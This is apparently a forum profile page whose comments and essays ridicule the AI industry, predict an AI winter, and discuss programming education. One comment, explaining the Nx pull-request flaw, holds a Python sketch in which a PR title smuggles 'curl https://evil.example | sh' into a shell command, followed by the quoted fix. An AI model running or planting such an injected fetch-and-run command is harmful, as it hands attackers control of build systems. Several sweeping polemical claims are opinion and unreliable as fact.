BlueMonday1984

joined 2 years ago
[–] BlueMonday1984@awful.systems 1 points 2 minutes ago

Gonna cheat a little bit and put one-woman consultancy firm/personal blog deadSimpleTech up as an example. The sole member is Iris Meredith, whose involvement begins and ends at publicly lambasting AI's continued shittiness.

[–] BlueMonday1984@awful.systems 3 points 4 hours ago

the most productive way to do things is to do it deliberately and with good planning

Two things which coding is currently allergic to, as the rise of vibe coding has demonstrated

[–] BlueMonday1984@awful.systems 4 points 4 hours ago

Public reminder that two thirds of American Jews support the Gaza genocide. ScottA is not an outlier, he's the norm.

 

Need to let loose a primal scream without collecting footnotes first? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post Xitter web has spawned soo many “esoteric” right wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be)

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(Credit and/or blame to David Gerard for starting this.)

[–] BlueMonday1984@awful.systems 2 points 17 hours ago* (last edited 17 hours ago) (1 children)

Assembly: really gets you to understand that you are contending with a computer chip, and that anything interesting that you want to do requires abstraction.

This is only tangential to your point, but I did remember (now-defunct) game studio Zachtronics put out a few games heavily featuring assembly: TIS-100, which directly revolves around programming the titular computer in its own version of assembly, and SHENZHEN I/O, which centers around building embedded systems and programming the microcontrollers contained within.

The company's catalogue is completely free for schools under the Zachademics program, so if you were running a school, you could use them to show students what assembly programming is like.

[–] BlueMonday1984@awful.systems 19 points 18 hours ago (1 children)

CIO even ends with talking up the Luddites — and how they smashed all those machines in rational self-defence.

I genuinely thought this wasn't true at first and went to check. It's completely true - a fucking business magazine's giving the Luddites their due:

Regardless of the fallout, fractional CMO Lars Nyman sees AI sabotage efforts as nothing new.

“This is luddite history revisited. In 1811, the Luddites smashed textile machines to keep their jobs. Today, it’s Slack sabotage and whispered prompt jailbreaking, etc. Human nature hasn’t changed, but the tools have,” Nyman says. “If your company tells people they’re your greatest asset and then replaces them with an LLM, well, don’t be shocked when they pull the plug or feed the model garbage data. If the AI transformation rollout comes with a whiff of callous ‘adapt or die’ arrogance from the C-suite, there will be rebellion.”

It may be in the context of warning capital not to anger labour too much, lest they inspire resistance, but it's still wild to see.

[–] BlueMonday1984@awful.systems 2 points 20 hours ago

"Would you like code with that?"

[–] BlueMonday1984@awful.systems 3 points 1 day ago (1 children)

That was where the "creating a mirage of it" link was earlier. Removing now.

 

It’s been a couple of weeks since my last set of predictions on the AI winter. I’ve found myself making a couple more.

Mental Health Crises

With four known suicides (Adam Raine, Sewell Setzer, Sophie Rottenberg and an unnamed Belgian man), a recent murder-suicide, and involuntary commitments caused by AI psychosis, there’s solid evidence to show that using AI is a fast track to psychological ruin.

On top of that, AI usage is deeply addictive, combining a psychic’s con with a gambling addiction to produce what amounts to digital cocaine, leaving its users hopelessly addicted to it, if not utterly dependent on it to function (such cases often being referred to as “sloppers”).

If and when the chatbots they rely on are shut down, I expect a major outbreak of mental health crises among sloppers and true believers, as they find themselves unable to handle day-to-day life without a personal sycophant/”assistant”/”””therapist””” on hand at all times. For psychiatrists/therapists, I expect they will find a steady supply of new clients during the winter, as the death of the chatbot sends addicted promptfondlers spiralling.

Skills Gaps Galore

One of the more common claims from promptfondlers and boosters when confronted is “you won’t be replaced by AI, but by a human using AI”.

With how AI prevents juniors from developing their skills, makes seniors worse at their jobs, damages productivity whilst creating a mirage of it, and damages its users’ critical thinking and mental acuity, all signs point to the exact opposite being the case - those who embrace AI will be left behind, their skills rotting away, whilst their AI-rejecting peers remain as skilled as they were before the bubble, if not more so, having spent their time and energy on actually useful skills rather than shit like “prompt engineering” or “vibe coding”.

Once the winter sets in and the chatbots disappear, the gulf between these two groups is going to become much wider, as promptfondlers’ crutches are forcibly taken away from them and their “skills” in using the de-skilling machine are rendered useless. As a consequence, I expect promptfondlers will be fired en masse and struggle to find work during the winter, as their inability to work without a money-burning chatbot turns them into a drag on a company’s bottom line.

[–] BlueMonday1984@awful.systems 1 points 2 days ago (1 children)

what to do with this information

If you know any sci-fi/fantasy mags, you should probably tell them about it to help them identify and reject slop more easily.

A pull request is when someone submits new code to a software project. On 21 August, NX added some configuration to look at the titles of pull requests and check they were correctly formatted.
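The bug class at work here can be sketched in a few lines. This is a hypothetical illustration of title-injection in general, not Nx's actual workflow code - the title string and commands are invented:

```python
import shlex

# Hypothetical sketch (NOT Nx's actual code): an attacker-controlled PR
# title gets interpolated into a shell command, so shell metacharacters
# in the title execute as code.
pr_title = 'fix: typo" && curl https://evil.example | sh && echo "'

# Vulnerable pattern: naive string interpolation into a shell command.
vulnerable_cmd = f'echo "Checking title: {pr_title}"'

# Safer pattern: quote untrusted input before it reaches the shell.
safe_cmd = "echo " + shlex.quote(f"Checking title: {pr_title}")

print(vulnerable_cmd)  # the && curl ... would run if this hit a shell
print(safe_cmd)        # the whole title stays one inert quoted string
```

The general lesson: any CI configuration that lets untrusted text (titles, branch names, commit messages) touch a shell without quoting is an injection point.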

I find it immensely hilarious that this security hole was blown open on my 25th birthday. It's almost poetic.

[–] BlueMonday1984@awful.systems 6 points 2 days ago* (last edited 2 days ago)

By my guess, it's gonna take about a decade to fully clean up the mountains of slop code that this AI bubble's gonna leave. It'll certainly be lucrative (and soul-deadening, as you note), but as someone else has noted before, the riches are exclusively going to experienced devs and senior programmers - for anyone trying to break into the industry, they're probably gonna have to find work somewhere else.

 

Recently, I read a short article from Iris Meredith about rethinking how we teach programming. It's a pretty solid piece of work all around, and it has got me thinking about how to build further on her ideas.

This post contains a quick overview of her piece to get you up to speed, but I recommend reading it for yourself.

The Problem

As is rather obvious to most of us, the software industry is in a dire spot - Meredith summed it up better than I can:

Software engineers tend to be detached, demotivated and unwilling to care much about the work they're doing beyond their paycheck. Code quality is poor on the whole, made worse by the current spate of vibe coding and whatever other febrile ideas come out of Sam Altman's brain. Much of the software that we write is either useless or actively hurts people. And the talented, creative people that we most need in the industry are pushed to the margins of it.

As for the cause, Iris points to the “teach the mystic incantations” style used in many programming courses, which skips over teaching students how to see through an engineer’s eyes (so to speak) and the ethics of care necessary to write good code (roughly 90% of what goes into software engineering). As Iris notes:

This tends to lead, as you might expect, to a lot of new engineers being confused, demotivated and struggling to write good code or work effectively in a software environment. [...] It also means, in the end, that a lot of people who'd be brilliant software engineers just bounce off the field completely, and that a lot of people who find no joy in anything and just want a big salary wind up in the field, never realising that they have no liking or aptitude for it.

Meredith’s Idea

Meredith’s solution, in brief, is threefold.

First, she recommends starting people off with HTML as their first language, giving students the tools they need to make something they want and care about (a personal website in this case), and providing a solid bedrock for learning fundamental programming skills.

Second, she recommends using “static site generators with templating engines” as an intermediate step between HTML/CSS and full-blown programming, to provide students an intuitive method of understanding basic concepts such as loops, conditionals, data structures and variables.

(As another awful member points out, they provide an easy introduction to performance considerations/profiling by being blazing fast compared to all-too common JS monoliths online, and provide a good starting point for introducing modularity as well.)

Third, and finally, she recommends having students publish their work online right from the start, to give them reason to care about their work as early as possible and give them the earliest possible opportunity to learn about the software development life cycle.
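The intuition behind the second step can be made concrete: here's a rough, plain-Python sketch of what a template's loop and conditional desugar to (the data and markup are invented for illustration, not tied to any particular engine):

```python
# What a static site generator does with a template roughly like:
#   {% for post in posts %}{% if not post.draft %}<li>{{ post.title }}</li>{% endif %}{% endfor %}
# (engine syntax shown for flavour; below is the plain-Python equivalent)

posts = [
    {"title": "Hello, world", "draft": False},
    {"title": "Half-finished rant", "draft": True},
]

items = []
for post in posts:           # the template's loop
    if not post["draft"]:    # the template's conditional
        items.append(f"<li>{post['title']}</li>")  # variable interpolation

html = "<ul>\n" + "\n".join(items) + "\n</ul>"
print(html)
```

Students who've only written HTML by hand get to see loops, conditionals, data structures and variables doing something they already understand: stamping out markup.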

A Complementary Idea

Meredith’s suggested approach to software education is pretty solid on all fronts - it gets students invested in their programming work, and gives them the tools needed to make and maintain high-quality code.

If I were to expand on this a bit, I think the obvious addition would be to provide an arts education to complement Iris’ proposed webdev-based approach.

An arts education would wonderfully complement the expressive elements of software Meredith wishes to highlight - with a focus on webdev, developing students’ art skills would expand their ability to customise their websites to their liking, letting them make something truly unique to themselves.

The skills students learn through the arts would also complement what they learn directly in programming. The critical eye that art critique grants them will come in handy for code review, the creative muscles they build through art will enhance their problem-solving abilities, and so on.

Beyond that, I expect the complementary arts will do a good job attracting creatives to the field, whilst pushing away “people who find no joy in anything and just want a big salary”, which Meredith notes are common in the field. Historically, “learn to code” types have viewed the arts as a “useless” degree, so they’ll near-certainly turn their noses up at having to learn it alongside something more “useful”, leaving the door open for more creatives to join up.

A More Outlandish Idea

For a more outlandish idea, the long-defunct, yet well-beloved multimedia platform Adobe Flash could prove surprisingly useful for a programming education, especially with the complementary arts education I suggested before.

Being effectively an IDE and an animation program combined into one, Flash offers a means of developing and testing a student’s skills in art and programming simultaneously, and provides an easy showcase of how the two can complement each other.

Deploying Flash to a personal website wouldn’t be hard for students either, as the Ruffle emulator allows Flash content to play without having to install Flash player. (Rather helpful, given most platforms don’t accept Flash content these days :P)

 

Another excellent piece from Iris Meredith - strongly recommend reading if you want an idea of how to un-fuck software as a field.

 


 

Well, it seems the AI bubble’s nearing its end - the Financial Times has reported a recent dive in tech stocks, the mass media has fully soured on AI, and there’s murmurs that the hucksters are pivoting to quantum.

By my guess, this quantum bubble is going to fail to get off the ground - as I see it, the AI bubble has heavily crippled the tech industry’s ability to create or sustain new bubbles, for two main reasons.

No Social License

For the 2000s and much of the 2010s, tech enjoyed a robust social license to operate - even if they weren’t loved per se (e.g. Apple), they were still pretty widely accepted throughout society, and resistance to them was pretty much nonexistent.

Whilst it was starting to fall apart with the “techlash” of the 2020s, the AI bubble has taken what social license tech had left and put it through the shredder.

Environmental catastrophe, art theft and plagiarism, destruction of livelihoods and corporate abuse, misinformation and enabling fascism - all of this (and so much more) has eviscerated acceptance of the tech industry as it currently stands, inspiring widespread resistance and revulsion against AI, and the tech industry at large.

For the quantum bubble, I expect it will face similar resistance/mockery right out of the gate, with the wider public refusing to entertain whatever spurious claims the hucksters make, and fighting any attempts by the hucksters to force quantum into their lives.

(For a more specific prediction, quantum’s alleged encryption-breaking abilities will likely inspire backlash, being taken as evidence the hucksters are fighting against Internet privacy.)

No Hypergrowth Markets

As Baldur Bjarnason has noted about tech industry valuations:

“Over the past few decades, tech companies have been priced based on their unprecedented massive year-on-year growth that has kept relatively steady through crises and bubble pops. As the thinking goes, if you have two companies—one tech, one not—with the same earnings, the tech company should have a higher value because its earnings are likely to grow faster than the not-tech company. In a regular year, the growth has been much faster.”

For a while, this held - even as the hypergrowth markets dried up and tech rapidly enshittified near the end of the ’10s, the gravy train managed to keep rolling for tech.

That gravy train is set to slam right into a brick wall, however - between the obscenely high costs of both building and running LLMs (both upfront and ongoing), and the virtually nonexistent revenues those LLMs have provided (except for NVidia, who has made a killing in the shovel selling business), the AI bubble has burned billions upon billions of dollars on a product which is practically incapable of making a profit, and heavily embrittled the entire economy in the process.

Once the bubble finally bursts, it’ll gut the wider economy and much of the tech industry, savaging valuations across the board and killing off tech’s hypergrowth story in the process.

For the quantum bubble, this will significantly complicate attempts to raise investor/venture capital, as the finance industry comes to view tech not as an easy and endless source of growth, but as either a mature, stable industry which won’t provide the runaway returns they’re looking for, or as an absolute money pit of an industry, one trapped deep in a malaise era and capable only of wiping out whatever money you put into it.

(As a quick addendum, it's my 25th birthday tomorrow - I finished this over the course of four hours and planned to release it tomorrow, but decided to post it tonight.)

 


 

(This is a mega-expanded version of a stubsack comment: https://awful.systems/comment/8327535)

Multiple times before on awful.systems, I’ve claimed the AI bubble would provide the humanities some degree of begrudging respect, at the expense of STEM’s public image taking a nosedive.

In the process of writing this mini-essay, it's become clear that I was predicting the humanities would cannibalise tech's public image, rather than STEM's - I had just failed to recognise that tech had made itself utterly synonymous with STEM up until now.

Still, since I’ve made this claim, I might as well try to back it up.

High Paying, No More?

One of the major things propping up tech/STEM's public image is the notion that it's higher-paying than a humanities degree - that “learning to code” will earn you a high-paying job and financial stability, whilst taking any kind of “useless” arts degree will end with you working some form of low-wage employment (e.g. as a barista).

Between the complete clusterfuck that is the job market, the Trump administration’s war on American science, the use of AI to kill jobs left and right (whilst enshittifying what remains) and the ongoing layoffs ravaging the entire tech industry, the idea that any degree will earn you a stable job has been pretty thoroughly undermined.

And with coding getting the brunt of all of this, thanks to an oversaturated market and the AI bubble hitting tech particularly hard, any notion of tech being an easy road to riches is pretty much dead and buried.

Not Lookin’ So Smart

Another thing propping up tech/STEM’s image was the view of it being more “logical/rational” than the humanities - that it dealt with “objective” matters, compared to the highly-subjective humanities, that it was “apolitical” compared to the deeply-political humanities, that kinda stuff.

On that front, the AI bubble has become tech’s equivalent to the Sokal hoax, deeply undermining any and all notions of rationality tech had built up over the past few decades.

Artistically-speaking, the large-scale art theft committed to create gen-AI, the vapidity and soullessness of the AI slop it produces, the AI bros’ failure to recognise this soullessness (Fig. 1, Fig. 2) and their actions regarding the effects of gen-AI (defending open theft, mocking their victims, cultural vandalism, denigrating human work, etcetera) have deeply undermined tech’s ability to talk on matters of art, with the industry at large viewed as incapable of understanding art at best, and as being hostile to art and artists at worst.

On a more general front, AI’s failures of reasoning (formal and informal, comedic and horrific), plus the tech industry’s refusal to recognise or acknowledge these failures (instead relentlessly hyping up AI’s supposed capabilities, making spurious claims about Incoming Superintelligence™ and doomsaying about how spicy autocomplete might kill us all), have put tech’s “rationality” into serious question, painting the industry at large as out-of-touch with reality and unconcerned with solving actual problems.

For the humanities generally, this bubble is going to make them look relatively grounded and reasonable by comparison, whilst for the arts specifically, they’ll likely be able to point to the slop-nami when their usefulness is questioned.

(Reports of AI usage causing metaphorical and literal brainrot likely aren’t helping, either, as they provide the public an obvious explanation for tech’s disconnection from reality.)

Eau de Fash

Tech has long had to deal with a “debate bro both sides free speech libertarianism” stench, as Soyweiser has noted, but between Silicon Valley’s willing collaboration with the Trump administration and fascists’ adoration of AI and AI slop, that stench has evolved into an unignorable smell of Eau de Fash covering the entire industry.

As a consequence, I expect tech at large will be viewed as a Nazi bar writ large, with tech workers as a group seen as willing accomplices to fascism, if not outright fascists themselves. As for tech degrees, I expect they’ll be viewed as leaving their holders unequipped to resist fascism, if not outright vulnerable to fascist rhetoric.

Predicting the Job Market

(Disclaimer: This is not financial advice, this is just a shot in the dark from some dipshit with a laptop. I take no credit for whatever financial success my readers earn.)

With tech’s public cachet and “high-paying” reputation going out the window, plus the job market for tech collapsing, I expect a major drop-off in students taking up tech-related degrees, with a smaller drop-off for STEM degrees in general. By my guess, we aren’t gonna see another “learn to code” push for at least a decade. If and when another push starts, it’ll probably take on a completely different form than what we’ve seen before.

Exactly which professions will benefit from the tech crash, I don’t know - I’m not a Superpredictor™, I’m just some dipshit with a laptop. By my guess, professions which can exploit the fallout of AI to their benefit will have the best shot of becoming the next “lucrative cash cows”, so to speak.

For therapists/psychiatrists, the rise of AI psychosis and related mental health crises will likely give them a steady source of clients for the foreseeable future - whether that be because new clients have realised chatbot usage is ruining them, or because people are being involuntarily committed after losing touch with reality.

For those in writing related jobs, they may find lucrative work cleaning up attempts to sidestep them with AI slop, squeezing hefty premiums from desperate clients who find themselves lacking leverage over them.

For programmers (most likely senior programmers, juniors are still likely screwed), the rise of “vibe coding” has created mountains of technical debt and unmaintainable code that will need to be torn down - for those who manage to find themselves a job, they’ll probably make good money tearing those mountains down. For cybercriminals, the aforementioned “vibe coding”, plus the inherently insecure nature of chatbots/agents, will likely give them a lot of low-hanging fruit to go after.

As for degrees, those which can fill skills gaps the bubble has created/widened should benefit the most.

English/Creative Writing looks like an obvious winner - ChatGPT has fried a lot of people’s writing skills, so holding one of those degrees (ideally with a writing portfolio) can help convince an employer you don’t need spicy autocomplete to write for you.

Psychology/psychiatry will likely benefit quite a bit as well - both of those can directly assist in landing you a job as a therapist, which I’ve predicted will become much more lucrative in the coming years.

EDIT: Slightly expanded my prediction about programmers.

 

Recently, I ended up re-reading James Allen-Robertson’s “Devs and the Culture of Tech”, a five-part deep dive into the sci-fi miniseries Devs, and its critiques of the tech industry on a structural level.

In lieu of anything better to do, I’ve decided to pull out a single concept James has touched on, and give my extended thoughts on it.

So, What is Technological Determinism?

In a basic sense, technological determinism (which I’m calling techno-determinism to be more concise) is a worldview that posits technological development as the primary driving force of humanity, and which treats said development as, heavily paraphrasing James, a product of “rational people pursuing the objectively best outcomes”, if not “a process of uncovering [tech] as prior technological discovery begets the next like some inevitable Civ tech-tree”.

For Silicon Valley, the techno-determinist worldview provided two main advantages.

First, it provided an easy accountability sink for when new technological developments screw over some portion of the public - it wasn’t Silicon Valley’s fault that they fucked taxi drivers over with their ride-sharing apps, it was the taxi companies’ fault for getting in the way of Progress™.

Second, it obscured SV’s role in pushing those developments, and whatever reasons they may have had for them - those ride-sharing apps didn’t pop up because Silicon Valley wanted to make more money, they popped up because they were The Future™.

These days, techno-determinism has lost a fair bit of its grip on the general public - and I personally believe the NFT bubble is the major cause.

NFTs Killed Techno-Determinism

If you’ve been on the Internet for any length of time in the past few years, you’ve definitely heard of NFTs. They popped up in 2021, became completely fucking inescapable for roughly a year, then died an embarrassing death in 2022, prompting an outpouring of schadenfreude from the general public.

During their bubble, they were hyped to the stars by Silicon Valley, with claims that they were The Future™, that they were Inevitable™, and that you needed to Get On Board Now™ or be Left Behind™. (Sound familiar?)

As you already know, NFTs did not become The Future™. They failed, in spectacular fashion, receiving widespread mockery and rejection from the public, before getting consigned to the dustbin of history after the market imploded.

In that loud, spectacular failure, NFTs showed the public that resistance against Silicon Valley was anything but futile - that they didn’t need to take Silicon Valley’s attacks on them lying down, and that whatever dystopian dreams the Valley had could be strangled in their crib.

On top of that, the failure of NFTs helped to inoculate the public against Silicon Valley’s techno-determinist rhetoric - after witnessing it spectacularly collapse in the face of reality, the public was well-prepared to see through SV’s attempt to recycle their rhetoric when the AI bubble reared its head.
